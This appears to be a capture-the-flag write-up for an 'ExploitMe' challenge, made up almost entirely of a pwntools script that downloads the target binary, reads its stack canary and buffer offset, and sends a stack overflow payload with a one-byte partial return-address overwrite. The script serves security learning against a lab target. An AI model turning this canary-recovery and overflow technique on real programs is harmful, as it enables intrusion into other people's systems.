
ExploitMe

  • Technique: Scripting ASLR bypass

Script

# Exploit script for the "ExploitMe" challenge: fetch the target binary from
# the service, recover the stack canary and the buffer distance from the
# binary itself, then send a single overflow payload.  Requires pwntools.
from pwn import *
import base64

# Connect to the challenge service and wait for its banner line.
r = remote('cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com', 10914)
r.recvuntil(b'Exploit Me>\n')
# The service sends the target binary base64-encoded, terminated by the
# "input>" prompt; drop=True strips the prompt before decoding.
elf_bytes = r.recvuntil(b'input>', drop=True).decode()
elf_bytes = base64.b64decode(elf_bytes)

# Save the decoded binary to disk so pwntools can parse it.
# (A `with open(...)` block would be the idiomatic form; the explicit
# close() below is equivalent on the happy path.)
fp = open('exploitme', 'wb')
fp.write(elf_bytes)
fp.close()

# Parse the binary and make it the context binary (arch/bits follow it).
elf = context.binary = ELF('./exploitme')
# Wrap the 8 bytes read at address 0x12b0 as a tiny code-only ELF at vma
# 0xc000 and disassemble 7 bytes from its entry; the last whitespace-separated
# token of the listing is parsed as a hex immediate and 8 is subtracted.
# NOTE(review): that immediate is presumably the frame/buffer size, making
# `pad` the distance from the overflowed buffer to the canary slot — confirm
# against the disassembly; the split-on-space parsing is fragile if the
# instruction ever has more than one operand.
e = ELF.from_bytes(elf.read(0x12b0,8), vma=0xc000)
pad = int(e.disasm(e.entry,7).split(' ')[-1],16) - 8
# The canary is read straight out of the binary (8 bytes at address 0x4010):
# apparently a fixed value stored in the program rather than a per-process
# random one, which is what lets it be reproduced here.  The bytes are
# reversed so the default big-endian conversion yields the little-endian
# value; `int.from_bytes` without an explicit byteorder needs Python 3.11+
# (`int.from_bytes(..., 'little')` without the reversal is the portable form).
canary = int.from_bytes(elf.read(0x4010,8)[::-1])

log.info(f"canary: {hex(canary)}")

# Payload layout: `pad` filler bytes, the canary (little-endian via p64),
# 8 more filler bytes, then a single byte 0x55.
# NOTE(review): the 8 filler bytes presumably cover the saved frame pointer
# and the lone 0x55 overwrites only the low byte of the saved return address
# (a partial overwrite, matching the page's "ASLR bypass" technique) — confirm
# against the binary's frame layout.
payload = b'A'*pad + p64(canary) + b'A'*8 + b'\x55'
r.send(payload)
r.interactive()